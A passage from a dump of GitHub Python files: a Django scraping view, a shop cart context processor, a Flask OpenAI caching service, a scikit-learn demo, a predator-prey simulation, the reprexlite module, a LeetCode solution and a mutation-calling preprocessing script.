itm\n\n","repo_name":"Alex-vz/danc_python","sub_path":"code/danc_python/bases.py","file_name":"bases.py","file_ext":"py","file_size_in_byte":16387,"program_lang":"python","lang":"ru","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"39477830752","text":"from django.shortcuts import render\nfrom bs4 import BeautifulSoup\nimport requests\nimport re\nimport pandas as pd\n\n# Create your views here.\ndef home(request):\n url = \"https://www.moh.gov.sg/covid-19-phase-advisory\"\n news = \"https://www.straitstimes.com/coronavirus\"\n\n response = requests.get(url)\n soup = BeautifulSoup(response.text, 'html.parser')\n rules = soup.findAll('div', {'class':'activity-container'})\n\n Text_lst = []\n Text_lst.clear\n context = 0\n\n for rule in rules[:19]:\n title = rule.find('p').text\n title=title.replace(\"^^\",\"\\n\")\n title=title.replace(\"^^.\",\"\\n\")\n title=title.replace(\"^\",\"\\n\")\n title=title.replace(\"\\n\",\" \")\n Text_lst.append(title)\n context = {'Text_lst' : Text_lst}\n\t\n return render(request, 'accounts/dashboard.html', context)","repo_name":"wang-yangyi/SMU-lit-project","sub_path":"accounts/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":831,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"12986915085","text":"from .models import Category,Cart,CartItem\nfrom .views import _cart_id\ndef layout_context(request):\n categories = Category.objects.all()\n counter = 0\n if 'admin' in request.path:\n return {}\n try:\n cart = Cart.objects.filter(cart_id = _cart_id(request))\n if request.user.is_authenticated:\n cart_items = CartItem.objects.filter(customer__id = request.user.id)\n else: \n cart_items = CartItem.objects.filter(cart = cart[:1])\n for cart_item in cart_items:\n counter += cart_item.quantity\n except:\n pass\n\n return {\n 'categories':categories ,\n 'count':counter\n\n }\n\n \n\n","repo_name":"sanoy-si/ECommerce","sub_path":"shop/context_processors.py","file_name":"context_processors.py","file_ext":"py","file_size_in_byte":674,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"38763632962","text":"import json\nimport os\n\nfrom flask import Flask, jsonify, request\nimport openai\nfrom dotenv import load_dotenv\nimport hashlib\nfrom apig_wsgi import make_lambda_handler\nimport boto3\n\napp = Flask(__name__)\n\n\n# Just to be sure that the endpoint itself works\n@app.route('/')\ndef main():\n return \"working\"\n\n\n@app.route('/api/get_completion', methods=['POST'])\ndef post_data():\n data = request.get_json()\n # print(data.keys())\n\n prompt = data['prompt']\n res,cache_key = get_openai_response(prompt)\n try:\n res = json.loads(res, strict=False)\n except Exception as err:\n print('non-json response', err, prompt, res)\n return jsonify({\"err\": \"non-json-response-from-oai\"}), 400\n\n content = None\n try:\n content = res['choices'][0]['message']['content']\n except:\n print('res:', res)\n return jsonify({\"err\": \"oai-response-wrong-format\", \"cache_key\": cache_key}), 400\n\n try:\n print('content: ', content)\n content = json.loads(content, strict=False)\n except Exception as inst:\n print('request:', request.data)\n print('response:', res)\n print('decoding error', inst)\n print('cache key', cache_key)\n return jsonify({\"err\": \"cgpt-response-not-in-json\", \"cache_key\": cache_key}), 400\n # print(content)\n\n return jsonify(content)\n\n\nclass LocalCacher:\n def __init__(self, cache_dir='./.cache'):\n self.dir = cache_dir\n\n def key_exists(self, key):\n return os.path.isfile(os.path.join(self.dir, key))\n\n def get(self, key):\n file_name = os.path.join(self.dir, key)\n with open(file_name, 'r') as f:\n return f.read()\n\n def put(self, key, value):\n file_name = os.path.join(self.dir, key)\n with open(file_name, 'w') as f:\n f.write(value)\n\n\nclass S3Cacher:\n def __init__(self, bucket_name, prefix='cache'):\n self.bucket_name = bucket_name\n self.prefix = prefix\n self.s3 = boto3.client('s3')\n\n def get_key(self, key):\n return f\"{self.prefix}/{key}\" if self.prefix else key\n\n def key_exists(self, key):\n s3_key = self.get_key(key)\n try:\n self.s3.head_object(Bucket=self.bucket_name, Key=s3_key)\n return True\n except:\n return False\n\n def get(self, key):\n s3_key = self.get_key(key)\n obj = self.s3.get_object(Bucket=self.bucket_name, Key=s3_key)\n return obj['Body'].read().decode('utf-8')\n\n def put(self, key, value):\n s3_key = self.get_key(key)\n self.s3.put_object(Bucket=self.bucket_name, Key=s3_key, Body=value)\n\n\ndef get_openai_response(prompt, system=\"you are a helpful assistant\", suffix=None):\n \"\"\"\n Makes a cached API call to OpenAI\n :param prompt:\n :param system:\n :param suffix:\n :return:\n \"\"\"\n cacher = None\n if 'S3_BUCKET' in os.environ:\n # TODO: instantiate S3 cacher\n cacher = S3Cacher(os.environ['S3_BUCKET'])\n pass\n else:\n cacher = LocalCacher()\n\n cache_key = f\"{prompt.strip()}{system.strip()}{suffix.strip() if suffix is not None else ''}\"\n h = hashlib.new('sha256')\n h.update(cache_key.encode('utf-8'))\n cache_key = h.hexdigest()\n if cacher.key_exists(cache_key):\n contents = cacher.get(cache_key)\n return contents, cache_key\n newline = '\\n'\n messages = [\n {\"role\": \"system\", \"content\": system},\n {\"role\": \"user\", \"content\": f\"{prompt.strip()}{f'{newline}{suffix}' if suffix is not None else ''}\"},\n ]\n print('begin resp')\n oai_response = get_raw_openai_response(messages)\n print('end resp')\n\n cacher.put(cache_key, json.dumps(oai_response))\n return json.dumps(oai_response), cache_key\n\n\n# makes an actual OpenAI request\ndef get_raw_openai_response(messages):\n model = \"gpt-3.5-turbo\"\n # print(messages)\n resp = openai.ChatCompletion.create(\n model=model,\n messages=messages,\n temperature=0\n )\n return resp\n\n\n# if you need an example recursive request to play with\n# example_req = \"\"\"\n# Act as a c-level executive assistant. You are tasked to write press release and an FAQ about new product launch.\n# It should conform to Amazon's Working Backwards process,\n# The product is a new plush toy headcrab from HalfLife, it will be sold in our e-shop and delivered globally.\n# Ask required questions and write a resulting document when ready.\n# answer only in JSON of the following format:\n# {\n# \"questions\": [ \"question1\", \"question2\",...],\n# \"prfaq\": \"prfaq\",\n# \"comments\": \"if you want to add something freeform\"\n# }\n# \"\"\"\n\n# entry point for a lambda function\nlambda_handler = make_lambda_handler(app)\n\n# entry point for the local startup\nif __name__ == '__main__':\n load_dotenv()\n app.run(debug=True)\n","repo_name":"umaxfun/sheetgpt","sub_path":"sheetgpt.py","file_name":"sheetgpt.py","file_ext":"py","file_size_in_byte":4790,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"38942875730","text":"from sklearn.datasets import load_breast_cancer\nfrom sklearn.feature_selection import SelectPercentile\nfrom sklearn.model_selection import train_test_split\n\ncancer = load_breast_cancer()\nprint(\"cnacer.data.shape: {}\".format(cancer.data.shape))\n\n\nimport numpy as np\nrng = np.random.RandomState(42)\nnoise = rng.normal(size=(len(cancer.data), 50))\nprint(\"noise.shape: {}\".format(noise.shape))\n\nX_w_noise = np.hstack([cancer.data, noise])\nprint(\"X_w_noise.shape: {}\".format(X_w_noise.shape))\n\nX_train, X_test, y_train, y_test = train_test_split(X_w_noise, cancer.target, random_state=0, test_size=.5)\n\nselect = SelectPercentile(percentile=50)\nselect.fit(X_train, y_train)\n\nX_train_selected = select.transform(X_train)\n\nprint(\"X_train.shape: {}\".format(X_train.shape))\nprint(\"X_train_selected.shape: {}\".format(X_train_selected.shape))\n\n# Print selected features\nmask = select.get_support()\nprint(mask.shape)\n\nprint(mask.reshape(1, -1).shape)\n\nimport matplotlib.pyplot as plt\nplt.matshow(mask.reshape(1, -1), cmap='gray_r')\nplt.xlabel(\"Feature Number\")\nplt.show()\n","repo_name":"socurites/book-ml-with-python-example","sub_path":"chap4/feature_selection/univariate_statistics.py","file_name":"univariate_statistics.py","file_ext":"py","file_size_in_byte":1059,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"15535563762","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Thu Mar 30 13:56:09 2023\n\n@author: pascal\n\"\"\"\n\nfrom pylab import *\nimport copy as cp\nfrom numba import njit\n\nprey0 = 400 # initial prey population\nK = 500 # carrying capacity of prey\nprey_m = 0.03 # magnitude of movement of prey\nprey_d = 0.8 # death rate of prey\nprey_r = 0.1 # reproduction rate of prey\n\npred0 = 100 # initial predator population\nMaxPred = 1000 # max number of predators\npred_m = 0.05 # magnitude of movement of predators\npred_d = 0.1 # death rate of predators\npred_r = 0.5 # reproduction rate of predators\n\nr = 0.01 # 0.02 radius for proximity detection\nmut = 0.01 # mutation rate\n\nclass agent:\n pass\n\ndef initialise():\n #create lists for agents, populations, mobility, and reproduction\n global agents, preydata, preddata, preymob, predmob, preyrep, predrep \n agents = []\n preydata = []\n preddata = []\n preymob = []\n predmob = []\n preyrep = []\n predrep = []\n \n for i in range(prey0 + pred0):\n ag = agent()\n ag.type = 'prey' if i < prey0 else 'pred'\n ag.x = random()\n ag.y = random()\n ag.m = prey_m if i < prey0 else pred_m\n ag.r = prey_r if i < prey0 else pred_r\n agents.append(ag)\n\ndef observe():\n global agents, preydata, preddata, preymob, predmob, preyrep, predrep\n \n subplot(2, 2, 1) # now we need 2 rows and 2 columns for 4 plots; 1=top left\n cla()\n \n preys = [ag for ag in agents if ag.type == 'prey']\n if len(preys) > 0:\n x = [ag.x for ag in preys]\n y = [ag.y for ag in preys]\n plot(x, y, color='blue', marker='.', ls=\"\") \n # another way of setting colour and style, \n # ls is line style,which we dont want \n \n predators = [ag for ag in agents if ag.type == 'pred']\n if len(predators) > 0:\n x = [ag.x for ag in predators]\n y = [ag.y for ag in predators]\n plot(x, y, color = 'red', marker='o', ls=\"\")\n axis('image')\n axis([-0.1, 1.1, -0.1, 1.1]) #notice extension\n\n subplot(2, 2, 2) # population plot\n cla()\n plot(preydata, label = 'prey', color=\"blue\")\n plot(preddata, label = 'predator', color=\"red\")\n title('Population')\n legend()\n\n subplot(2, 2, 3) # movement rate plot\n cla()\n plot(preymob, label = 'prey', color=\"blue\")\n plot(predmob, label = 'predator', color=\"red\")\n title('Movement rate')\n legend()\n \n subplot(2, 2, 4) # reproduction rate plot\n cla()\n plot(preyrep, label = 'prey', color=\"blue\")\n plot(predrep, label = 'predator', color=\"red\")\n title('Reproductive rate')\n legend()\n tight_layout()\n \ndef update_agent():\n global agents\n if agents == []:\n return\n ag = choice(agents)\n\n # detecting neighbours\n neighbours = [nb for nb in agents if nb.type != ag.type\n and (ag.x - nb.x)**2 + (ag.y - nb.y)**2 < r**2]\n\n if ag.type == 'prey':\n mprey = ag.m\n rprey = ag.r\n if len(neighbours) > 0: # if there are predators nearby\n if random() < prey_d:\n agents.remove(ag)\n return\n else: # if you didn't die, run!\n ag.x += uniform(-mprey, mprey)\n ag.y += uniform(-mprey, mprey)\n ag.x = 1 if ag.x > 1 else 0 if ag.x < 0 else ag.x\n ag.y = 1 if ag.y > 1 else 0 if ag.y < 0 else ag.y \n else: # reproduce if there are no predators\n if random() < rprey*(1-sum([1 for x in agents if x.type == 'prey'])/K):\n offspring = cp.copy(ag)\n offspring.m = ag.m + uniform(-mut, mut) # offspring movement mutates\n offspring.r = ag.r + uniform(-mut, mut) # offspring reproductive rate mutates\n agents.append(offspring)\n ag.x += 0.9*uniform(-mprey, mprey) # then agent moves, but at slower rate if there are no predators\n ag.y += 0.9*uniform(-mprey, mprey)\n ag.x = 1 if ag.x > 1 else 0 if ag.x < 0 else ag.x # stay uîside plot\n ag.y = 1 if ag.y > 1 else 0 if ag.y < 0 else ag.y \n \n else: # if agent is a predator\n mpred = ag.m\n rpred = ag.r\n if len(neighbours) == 0: # if there are no prey nearby\n if random() < pred_d:\n agents.remove(ag)\n return\n else: # if no prey and predator doesnt die, predator must move\n ag.x += uniform(-mpred, mpred)\n ag.y += uniform(-mpred, mpred)\n ag.x = 1 if ag.x > 1 else 0 if ag.x < 0 else ag.x\n ag.y = 1 if ag.y > 1 else 0 if ag.y < 0 else ag.y\n \n else: # if there is prey nearby, stay and reproduce\n if random() < rpred*(1-sum([1 for x in agents if x.type == 'pred'])/MaxPred):\n offspring = cp.copy(ag)\n offspring.m = ag.m + uniform(-mut, mut)\n offspring.r = ag.r + uniform(-mut, mut)\n agents.append(offspring)\n\ndef update():\n global agents, preydata, preddata, preymob, predmob\n t = 0\n while t < 1 and len(agents) > 0:\n t += 1 / len(agents)\n update_agent()\n\n preydata.append(sum([1 for x in agents if x.type == 'prey'])) # store information on population, movement, reproduction\n preddata.append(sum([1 for x in agents if x.type == 'pred']))\n preymob.append(mean([t.m for t in agents if t.type == 'prey']))\n predmob.append(mean([t.m for t in agents if t.type == 'pred']))\n preyrep.append(mean([u.r for u in agents if u.type == 'prey']))\n predrep.append(mean([u.r for u in agents if u.type == 'pred']))\n \n\nsteps = 100 \nflag = True\nk = 0\ninitialise()\nfig =figure()\n# ax = add_subplot(1,2,1)\nobserve()\n\nwhile flag: \n k += 1\n update()\n if k%1 == 0:\n # ax.clear()\n observe()\n plt.pause(0.01)\n","repo_name":"pascalbartschi/modelling_cultural_evo","sub_path":"Agent_based_Modelling/ABM3_Predator_prey_evolution_spyder.py","file_name":"ABM3_Predator_prey_evolution_spyder.py","file_ext":"py","file_size_in_byte":5843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"72187207209","text":"from contextlib import redirect_stdout\nimport dataclasses\nfrom io import StringIO\nfrom itertools import chain\nimport os\nfrom pathlib import Path\nfrom pprint import pformat\nimport traceback\nfrom typing import Any, Dict, List, Optional, Sequence, Tuple, Union\n\ntry:\n from typing import Self # type: ignore # Python 3.11+\nexcept ImportError:\n from typing_extensions import Self\n\nimport libcst as cst\n\nfrom reprexlite.config import ParsingMethod, ReprexConfig\nfrom reprexlite.exceptions import BlackNotFoundError, InputSyntaxError, UnexpectedError\nfrom reprexlite.formatting import formatter_registry\nfrom reprexlite.parsing import LineType, auto_parse, parse\n\n\n@dataclasses.dataclass\nclass RawResult:\n \"\"\"Class that holds the result of evaluated code. Use `str(...)` on an instance to produce a\n pretty-formatted comment block representation of the result.\n\n Attributes:\n config (ReprexConfig): Configuration for formatting and parsing\n raw (Any): Some Python object that is the raw return value of evaluated Python code.\n stdout (str): Standard output from evaluated Python code.\n \"\"\"\n\n config: ReprexConfig\n raw: Any\n stdout: Optional[str]\n\n def __str__(self) -> str:\n if not self:\n raise UnexpectedError(\"Should not print a RawResult if it tests False.\")\n lines = []\n if self.stdout:\n lines.extend(self.stdout.split(\"\\n\"))\n if self.raw is not None:\n lines.extend(pformat(self.raw, indent=2, width=77).split(\"\\n\"))\n if self.config.comment:\n return \"\\n\".join(self.config.comment + \" \" + line for line in lines)\n else:\n return \"\\n\".join(lines)\n\n def __bool__(self) -> bool:\n \"\"\"Tests whether instance contains anything to print.\"\"\"\n return not (self.raw is None and self.stdout is None)\n\n def __repr__(self) -> str:\n return (\n f\"\"\n )\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, RawResult):\n return self.raw == other.raw and self.stdout == other.stdout\n else:\n return NotImplemented\n\n\n@dataclasses.dataclass\nclass ParsedResult:\n \"\"\"Class that holds parsed result from reading a reprex.\n\n Attributes:\n config (ReprexConfig): Configuration for formatting and parsing\n lines (List[str]): String content of result parsed from a reprex\n \"\"\"\n\n config: ReprexConfig\n lines: List[str]\n\n def __str__(self) -> str:\n if not self:\n raise UnexpectedError(\"Should not print a ParsedResult if it tests False.\")\n return \"\\n\".join(self.prefix * 2 + line for line in self.lines)\n\n def as_result_str(self) -> str:\n return \"\\n\".join(self.prefix + line for line in self.lines)\n\n @property\n def prefix(self) -> str:\n if self.config.comment:\n return self.config.comment + \" \"\n else:\n return \"\"\n\n def __bool__(self) -> bool:\n \"\"\"Tests whether instance contains anything to print.\"\"\"\n return bool(self.lines)\n\n def __repr__(self) -> str:\n joined = \"\\\\n\".join(self.lines)\n return f\"\"\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, ParsedResult):\n return self.lines == other.lines\n elif isinstance(other, RawResult):\n if not bool(self) and not bool(other):\n return True\n return bool(self) and bool(other) and self.as_result_str() == str(other)\n else:\n return NotImplemented\n\n\n@dataclasses.dataclass\nclass Statement:\n \"\"\"Dataclass that holds a LibCST parsed statement. of code.\n\n Attributes:\n config (ReprexConfig): Configuration for formatting and parsing\n stmt (Union[libcst.SimpleStatementLine, libcst.BaseCompoundStatement]): LibCST parsed\n statement.\n \"\"\"\n\n config: ReprexConfig\n stmt: Union[cst.SimpleStatementLine, cst.BaseCompoundStatement, cst.EmptyLine]\n\n def evaluate(self, scope: dict) -> RawResult:\n \"\"\"Evaluate code statement and produce a RawResult dataclass instance.\n\n Args:\n scope (dict): scope to use for evaluation\n\n Returns:\n RawResult: Dataclass instance holding evaluation results.\n \"\"\"\n if isinstance(self.stmt, cst.EmptyLine):\n return RawResult(config=self.config, raw=None, stdout=None)\n\n if \"__name__\" not in scope:\n scope[\"__name__\"] = \"__reprex__\"\n stdout_io = StringIO()\n try:\n with redirect_stdout(stdout_io):\n try:\n # Treat as a single expression\n result = eval(self.code.strip(), scope)\n except SyntaxError:\n # Treat as a statement\n exec(self.code.strip(), scope)\n result = None\n stdout = stdout_io.getvalue().strip()\n except Exception as exc:\n result = None\n # Skip first step of traceback, since that is this evaluate method\n if exc.__traceback__ is not None:\n tb = exc.__traceback__.tb_next\n stdout = (\n \"Traceback (most recent call last):\\n\"\n + \"\".join(line for line in traceback.format_tb(tb))\n + f\"{type(exc).__name__}: {exc}\"\n )\n finally:\n stdout_io.close()\n\n return RawResult(config=self.config, raw=result, stdout=stdout or None)\n\n @property\n def raw_code(self) -> str:\n \"\"\"Raw code of contained statement as a string.\"\"\"\n if isinstance(self.stmt, cst.EmptyLine):\n return cst.Module(body=[], header=[self.stmt]).code.rstrip()\n return cst.Module(body=[self.stmt]).code.rstrip()\n\n @property\n def code(self) -> str:\n \"\"\"Code of contained statement. May be autoformatted depending on configuration.\"\"\"\n code = self.raw_code\n if self.config.style:\n try:\n from black import Mode, format_str\n except ModuleNotFoundError as e:\n if e.name == \"black\":\n raise BlackNotFoundError(\"Must install black to restyle code.\", name=\"black\")\n else:\n raise\n\n code = format_str(code, mode=Mode())\n return code\n\n def __str__(self) -> str:\n out = self.code\n if self.config.prompt:\n # Add prompt and continuation prefixes to lines\n lines = out.split(\"\\n\")\n primary_found = False\n out = \"\"\n for line in lines:\n if line.strip() == \"\":\n # Whitespace line\n out += f\"{self.config.prompt} \" + line + \"\\n\"\n elif line.startswith(\"#\"):\n # Comment line\n out += f\"{self.config.prompt} \" + line + \"\\n\"\n else:\n # Code line\n if not primary_found:\n out += f\"{self.config.prompt} \" + line + \"\\n\"\n primary_found = True\n else:\n out += f\"{self.config.continuation} \" + line + \"\\n\"\n return out.rstrip()\n\n def __bool__(self) -> bool:\n \"\"\"Tests whether this instance contains anything to print. Always true for Statement.\"\"\"\n return True\n\n def __repr__(self) -> str:\n return f\"\"\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, Statement):\n return self.raw_code == other.raw_code\n return NotImplemented\n\n\n@dataclasses.dataclass\nclass Reprex:\n \"\"\"Dataclass for a reprex, which holds Python code and results from evaluation.\n\n Attributes:\n config (ReprexConfig): Configuration for formatting and parsing\n statements (List[Statement]): List of parsed Python code statements\n results (List[RawResult]): List of results evaluated from statements\n old_results (List[ParsedResult]): List of any old results parsed from input code\n scope (Dict[str, Any]): Dictionary holding the scope that the reprex was evaluated in\n \"\"\"\n\n config: ReprexConfig\n statements: List[Statement]\n results: List[RawResult]\n old_results: List[ParsedResult]\n scope: Dict[str, Any]\n\n def __post_init__(self) -> None:\n if not (len(self.statements) == len(self.results) == len(self.old_results)):\n raise UnexpectedError(\n \"statements, results, and old_results should all be the same length. \"\n f\"Got: {(len(self.statements), len(self.results), len(self.old_results))}.\"\n )\n\n @classmethod\n def from_input(\n cls,\n input: str,\n config: Optional[ReprexConfig] = None,\n scope: Optional[Dict[str, Any]] = None,\n ) -> Self:\n \"\"\"Create a Reprex instance from parsing and evaluating code from a string.\n\n Args:\n input (str): Input code\n config (Optional[ReprexConfig], optional): Configuration. Defaults to None, which will\n use default settings.\n scope (Optional[Dict[str, Any]], optional): Dictionary holding scope that the parsed\n code will be evaluated with. Defaults to None, which will create an empty\n dictionary.\n\n Returns:\n Reprex: New instance of Reprex.\n \"\"\"\n if config is None:\n config = ReprexConfig()\n if config.parsing_method == ParsingMethod.AUTO:\n lines = list(auto_parse(input))\n elif config.parsing_method == ParsingMethod.DECLARED:\n lines = list(\n parse(\n input,\n prompt=config.resolved_input_prompt,\n continuation=config.resolved_input_continuation,\n comment=config.resolved_input_comment,\n )\n )\n else:\n raise UnexpectedError( # pragma: nocover\n f\"Parsing method {config.parsing_method} is not implemented.\"\n )\n return cls.from_input_lines(lines, config=config, scope=scope)\n\n @classmethod\n def from_input_lines(\n cls,\n lines: Sequence[Tuple[str, LineType]],\n config: Optional[ReprexConfig] = None,\n scope: Optional[Dict[str, Any]] = None,\n ) -> Self:\n \"\"\"Creates a Reprex instance from the output of [parse][reprexlite.parsing.parse].\n\n Args:\n lines (Sequence[Tuple[str, LineType]]): Output from parse.\n config (Optional[ReprexConfig], optional): Configuration. Defaults to None, which will\n use default settings.\n scope (Optional[Dict[str, Any]], optional): Dictionary holding scope that the parsed\n code will be evaluated with. Defaults to None, which will create an empty\n dictionary.\n\n Returns:\n Reprex: New instance of Reprex.\n \"\"\"\n if config is None:\n config = ReprexConfig()\n statements: List[Statement] = []\n old_results: List[ParsedResult] = []\n current_code_block: List[str] = []\n current_result_block: List[str] = []\n try:\n for line_content, line_type in lines:\n if line_type is LineType.CODE:\n # Flush results\n if current_result_block:\n old_results += [ParsedResult(config=config, lines=current_result_block)]\n current_result_block = []\n # Append line to current code\n current_code_block.append(line_content)\n elif line_type is LineType.RESULT:\n # Flush code\n if current_code_block:\n # Parse code and create Statements\n tree: cst.Module = cst.parse_module(\"\\n\".join(current_code_block))\n new_statements = (\n [Statement(config=config, stmt=stmt) for stmt in tree.header]\n + [Statement(config=config, stmt=stmt) for stmt in tree.body]\n + [Statement(config=config, stmt=stmt) for stmt in tree.footer]\n )\n statements += new_statements\n # Pad results with empty results, 1 fewer because of current_result_block\n old_results += [ParsedResult(config=config, lines=[])] * (\n len(new_statements) - 1\n )\n # Reset current code block\n current_code_block = []\n # Append line to current results\n current_result_block.append(line_content)\n # Flush code\n if current_code_block:\n if all(not line for line in current_code_block):\n # Case where all lines are whitespace: strip and don't add\n new_statements = []\n else:\n # Parse code and create Statements\n tree: cst.Module = cst.parse_module( # type: ignore[no-redef]\n \"\\n\".join(current_code_block)\n )\n new_statements = (\n [Statement(config=config, stmt=stmt) for stmt in tree.header]\n + [Statement(config=config, stmt=stmt) for stmt in tree.body]\n + [Statement(config=config, stmt=stmt) for stmt in tree.footer]\n )\n # Pad results with empty results, 1 fewer because of current_result_block\n statements += new_statements\n old_results += [ParsedResult(config=config, lines=[])] * (len(new_statements) - 1)\n # Flush results\n if current_result_block:\n old_results += [ParsedResult(config=config, lines=current_result_block)]\n # Pad results to equal length\n old_results += [ParsedResult(config=config, lines=[])] * (\n len(statements) - len(old_results)\n )\n\n # Evaluate for new results\n if scope is None:\n scope = {}\n results = [statement.evaluate(scope=scope) for statement in statements]\n return cls(\n config=config,\n statements=statements,\n results=results,\n old_results=old_results,\n scope=scope,\n )\n except cst.ParserSyntaxError as e:\n raise InputSyntaxError(str(e)) from e\n\n def __eq__(self, other: Any) -> bool:\n if isinstance(other, Reprex):\n return (\n self.config == other.config\n and all(left == right for left, right in zip(self.statements, other.statements))\n and all(left == right for left, right in zip(self.results, other.results))\n and all(left == right for left, right in zip(self.old_results, other.old_results))\n )\n else:\n return NotImplemented\n\n def __str__(self) -> str:\n if self.config.keep_old_results:\n lines = chain.from_iterable(zip(self.statements, self.old_results, self.results))\n else:\n lines = chain.from_iterable(zip(self.statements, self.results))\n out = \"\\n\".join(str(line) for line in lines if line)\n if not out.endswith(\"\\n\"):\n out += \"\\n\"\n return out\n\n @property\n def results_match(self) -> bool:\n \"\"\"Whether results of evaluating code match old results parsed from input.\"\"\"\n return all(\n result == old_result for result, old_result in zip(self.results, self.old_results)\n )\n\n def format(self, terminal: bool = False) -> str:\n out = str(self)\n if terminal:\n try:\n from pygments import highlight\n from pygments.formatters import Terminal256Formatter\n from pygments.lexers import PythonLexer\n\n out = highlight(out, PythonLexer(), Terminal256Formatter(style=\"friendly\"))\n except ModuleNotFoundError:\n pass\n formatter = formatter_registry[self.config.venue]\n return formatter.format(\n out.strip(), advertise=self.config.advertise, session_info=self.config.session_info\n )\n\n def __repr__(self) -> str:\n return f\"\"\n\n def _repr_html_(self) -> str:\n \"\"\"HTML representation. Used for rendering in Jupyter.\"\"\"\n out = []\n try:\n from pygments import highlight\n from pygments.formatters import HtmlFormatter\n from pygments.lexers import PythonLexer\n\n formatter = HtmlFormatter(style=\"friendly\", wrapcode=True)\n out.append(f\"\")\n out.append(highlight(self.format(), PythonLexer(), formatter))\n except ModuleNotFoundError:\n out.append(f\"
{self.format()}
\")\n return \"\\n\".join(out)\n\n\ndef to_snippet(s: str, n: int) -> str:\n if len(s) <= n:\n return rf\"{s}\"\n else:\n return rf\"{s[:n]}...\"\n\n\ndef reprex(\n input: str,\n outfile: Optional[Union[str, os.PathLike]] = None,\n print_: bool = True,\n terminal: bool = False,\n config: Optional[ReprexConfig] = None,\n **kwargs,\n) -> Reprex:\n \"\"\"A convenient functional interface to render reproducible examples of Python code for\n sharing. This function will evaluate your code and, by default, print out your code with the\n evaluated results embedded as comments, formatted with additional markup appropriate to the\n sharing venue set by the `venue` keyword argument. The function returns an instance of\n [`Reprex`][reprexlite.reprexes.Reprex] which holds the relevant data.\n\n For example, for the `gh` venue for GitHub Flavored Markdown, you'll get a reprex whose\n formatted output looks like:\n\n ````\n ```python\n x = 2\n x + 2\n #> 4\n ```\n\n Created at 2021-02-15 16:58:47 PST by [reprexlite](https://github.com/jayqi/reprexlite)\n ````\n\n\n Args:\n input (str): Input code to create a reprex for.\n outfile (Optional[str | os.PathLike]): If provided, path to write formatted reprex\n output to. Defaults to None, which does not write to any file.\n print_ (bool): Whether to print formatted reprex output to console.\n terminal (bool): Whether currently in a terminal. If true, will automatically apply code\n highlighting if pygments is installed.\n config (Optional[ReprexConfig]): Instance of the configuration dataclass. Default of none\n will instantiate one with default values.\n **kwargs: Configuration options from [ReprexConfig][reprexlite.config.ReprexConfig]. Any\n provided values will override values from provided config or the defaults.\n\n Returns:\n (Reprex) Reprex instance\n \"\"\" # noqa: E501\n\n if config is None:\n config = ReprexConfig(**kwargs)\n else:\n config = dataclasses.replace(config, **kwargs)\n\n config = ReprexConfig(**kwargs)\n if config.venue in [\"html\", \"rtf\"]:\n # Don't screw up output file or lexing for HTML and RTF with terminal syntax highlighting\n terminal = False\n r = Reprex.from_input(input, config=config)\n output = r.format(terminal=terminal)\n if outfile is not None:\n with Path(outfile).open(\"w\") as fp:\n fp.write(r.format(terminal=False))\n if print_:\n print(output)\n return r\n","repo_name":"jayqi/reprexlite","sub_path":"reprexlite/reprexes.py","file_name":"reprexes.py","file_ext":"py","file_size_in_byte":19891,"program_lang":"python","lang":"en","doc_type":"code","stars":12,"dataset":"github-code","pt":"53"} +{"seq_id":"71888471209","text":"# leetcode 931. Minimum Falling Path Sum\n\nclass Solution:\n def minFallingPathSum(self, matrix: List[List[int]]) -> int:\n n = len(matrix)\n dp = [[int(1e9)]*n for _ in range(n)]\n \n for i in range(n) :\n dp[0][i] = matrix[0][i]\n \n for i in range(1,n) :\n for j in range(n) :\n if j-1 >= 0 :\n dp[i][j-1] = min(dp[i][j-1],dp[i-1][j]+matrix[i][j-1])\n if j+1 < n :\n dp[i][j+1] = min(dp[i][j+1],dp[i-1][j]+matrix[i][j+1])\n dp[i][j] = min(dp[i][j],dp[i-1][j]+matrix[i][j]) \n\n\n return min(dp[n-1])","repo_name":"do0134/solostudy","sub_path":"algorithm/2022/12월/1214/1213-1sol.py","file_name":"1213-1sol.py","file_ext":"py","file_size_in_byte":641,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"69926021290","text":"def mutectPreAnnovar(genome_infile, mt_infile, pair, outfile):\n\n import pandas as pd\n\n # set some needed data types\n dtype = {'contig': 'str',\n 'position': 'str',\n 'n_ref_count': 'int',\n 't_ref_count': 'int'}\n\n # load MUTECT tables\n genome = pd.read_table(genome_infile, sep='\\t', header=1, dtype=dtype)\n mt = pd.read_table(mt_infile, sep='\\t', header=1, dtype=dtype)\n\n # remove 'MT' variants called by 'genomic branch' of the pipeline\n genome = genome.loc[genome.contig != 'MT',]\n\n # merge\n mutect = pd.concat([genome, mt])\n\n # re-organize first columns to fit ANNOVAR\n # remove tumor and normal names columns\n mutect = pd.concat([pd.DataFrame({'chrom': mutect.contig}),\n pd.DataFrame({'start': mutect.position}),\n pd.DataFrame({'end': mutect.position}),\n pd.DataFrame({'ref': mutect.ref_allele}),\n pd.DataFrame({'alt': mutect.alt_allele}),\n mutect.context,\n mutect.iloc[:,7:]\n ], axis=1)\n\n # compute N and T depth\n mutect['n_depth'] = mutect.n_ref_count + mutect.n_alt_count\n mutect['t_depth'] = mutect.t_ref_count + mutect.t_alt_count\n\n # compute N and T VAF\n mutect['n_vaf'] = mutect.n_alt_count / mutect.n_depth\n mutect['t_vaf'] = mutect.t_alt_count / mutect.t_depth\n\n # create 'variant' column\n mutect['variant'] = ['_'.join(row[:5].tolist() + [pair]) for i, row in mutect.iterrows()]\n\n # write to file\n mutect.to_csv(outfile, sep='\\t', index=False)\n\nmutectPreAnnovar(snakemake.input['genome_infile'],\n snakemake.input['mt_infile'],\n snakemake.params['pair'],\n 